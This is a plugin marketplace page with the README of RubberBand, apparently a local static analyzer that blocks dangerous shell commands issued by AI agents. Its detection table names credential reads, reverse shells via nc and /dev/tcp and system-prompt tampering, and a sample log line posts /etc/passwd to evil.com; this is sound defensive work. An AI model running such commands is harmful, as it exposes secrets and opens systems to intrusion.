Remote OpenClaw
Menu

rubberband

jeffaf/rubberband

Otheropenclawby jeffaf

Summary

OpenClaw plugin exposing 0 skills.

Install to Claude Code

openclaw plugin add jeffaf/rubberband

Run in Claude Code. Add the marketplace first with /plugin marketplace add jeffaf/rubberband if you haven't already.

README.md

RubberBand

Static command pattern detection plugin for OpenClaw. Intercepts exec tool calls and blocks dangerous commands before they run.

Zero dependencies. No cloud calls. Pure local static analysis in <3ms per command.

Built against OpenClaw v2026.5.18. Current OpenClaw before_tool_call hooks support block and parameter mutation; older requireApproval hook responses are not part of the current hook result contract.

Install

openclaw plugins install @jeffaf/rubberband
openclaw gateway restart

Verify it loaded:

openclaw logs --limit 20 | grep -i rubberband
# Should show: [plugins] RubberBand plugin active (mode: block)

Manual Install (from source)

cd ~/.openclaw/extensions
git clone https://github.com/jeffaf/rubberband.git
openclaw gateway restart

Update

# npm
openclaw plugins update rubberband

# git
cd ~/.openclaw/extensions/rubberband && git pull
openclaw gateway restart

What It Does

RubberBand hooks into the before_tool_call event and analyzes every exec command for dangerous patterns. It scores commands based on 18 detection categories and blocks, requires approval, or logs based on configurable thresholds.

When a command is blocked:

  • The agent receives the block reason (visible in chat)
  • A 🔴 system event is injected into the session history
  • The event is logged to ~/.openclaw/logs/rubberband.log (JSONL)

When a command triggers ALERT:

  • The event is logged but not blocked, because current OpenClaw hook results do not expose a plugin approval prompt
  • Use thresholds to reserve hard blocking for high-confidence BLOCK findings
  • The event is logged to ~/.openclaw/logs/rubberband.log (JSONL)

Detection Categories

| Category | Examples | Score | |----------|----------|-------| | Credential Access | cat ~/.ssh/id_rsa, AWS keys, keychains | 60-80 | | Data Exfiltration | curl -X POST to external hosts | 40-70 | | Reverse Shells | nc -e, bash /dev/tcp, ngrok tunnels | 90 | | Config Tampering | Writes to SOUL.md, system prompts | 75 | | Persistence | Crontab, LaunchAgents, shell rc modifications | 60 | | Indirect Execution | Pipe to shell, eval, base64 decode + exec | 30-50 | | Reconnaissance | whoami, env, ps aux chains | 30 |

Thresholds

| Score | Default Disposition | Behavior | |-------|-------------|----------| | 0 | ALLOW | No detection | | 1-39 | LOG | Logged to audit file | | 40-59 | ALERT | ⚠️ audit log only until OpenClaw exposes plugin approval prompts | | 60+ | BLOCK | 🔴 Command rejected + system event + audit log |

Audit Log

All BLOCK, ALERT, and LOG events are written to ~/.openclaw/logs/rubberband.log as JSONL:

{"ts":"2026-02-24T13:26:14Z","disposition":"BLOCK","score":70,"rules":["network_exfil"],"command":"curl -X POST -d @/etc/passwd https://evil.com","sessionKey":"agent:main:main"}

View logs:

cat ~/.openclaw/logs/rubberband.log | jq .
tail -f ~/.openclaw/logs/rubberband.log | jq .

Configuration

In openclaw.json:

{
  "plugins": {
    "entries": {
      "rubberband": {
        "enabled": true,
        "config": {
          "mode": "block",
          "thresholds": {
            "alert": 40,
            "block": 60
          },
          "allowedDestinations": ["github.com", "api.openai.com"]
        }
      }
    }
  }
}

Modes

  • block (default) - Block commands above block threshold, alert above alert threshold
  • alert - Never block, only alert
  • log - Silent logging only
  • shadow - Like log, for testing without any user-visible output
  • off - Disabled

Tests / Build

npm run check

This runs TypeScript typecheck, Vitest, and a production build to dist/.

29 tests covering detection categories, edge cases, mode handling, public exports, and plugin hook responses.

How It Works

RubberBand is a pure TypeScript static analyzer. It normalizes commands (handling encoding, escaping, heredocs, etc.) and matches against pattern rules with weighted scoring.

The plugin registers a before_tool_call hook at priority 10. When an exec-like tool call comes in, it extracts command text from either command or cmd params and runs it through the analyzer. BLOCK results return { block: true, blockReason: "..." } for a hard stop. ALERT results are audit-log only until OpenClaw exposes a current approval hook result again.

Performance: Detection runs in under 3ms per command.

Project Status

RubberBand started as a native OpenClaw proposal, but the core PR path is closed. The live path is this plugin/community package.

Background: Discussion #4981.

License

MIT

Related plugins

Browse all →

__NAME__

RozoAI/rozo-intents-skills

OpenClaw plugin exposing 0 skills.

Open plugin →

0g-ai

ahippoly/OnChainClaw

OpenClaw plugin exposing 0 skills.

Open plugin →

5d-skills

5d-skills-marketplace

Complete 5D Spec-Driven Development methodology - 12 skills for structured software development with understanding before commitment

Open plugin →

a11y-audit

lemon-ai-hub

WCAG 2.1 AA/AAA accessibility audit for web components, pages, and apps. Detects contrast failures, missing ARIA labels, keyboard trap issues, focus order problems, and screen-reader gotchas. Use when user wants to audit accessibility, fix a11y warnings, prepare for compliance review, or validate UI against WCAG standards.

Open plugin →

a11y-guardian

lemon-ai-hub

Accessibility guardian plugin. Continuous WCAG 2.1 AA/AAA compliance monitoring for web projects. Integrates static analysis of React/Vue/HTML components, contrast ratio checks, ARIA validation, keyboard navigation audit, and generates actionable HTML reports. Pairs with a11y-audit skill.

Open plugin →

a2a-gateway

win4r/openclaw-a2a-gateway

OpenClaw plugin exposing 0 skills.

Open plugin →

Browse

Plugins by category

Other2041development375productivity237communication49design47security46database40workflow30compliance28product24data22bundle21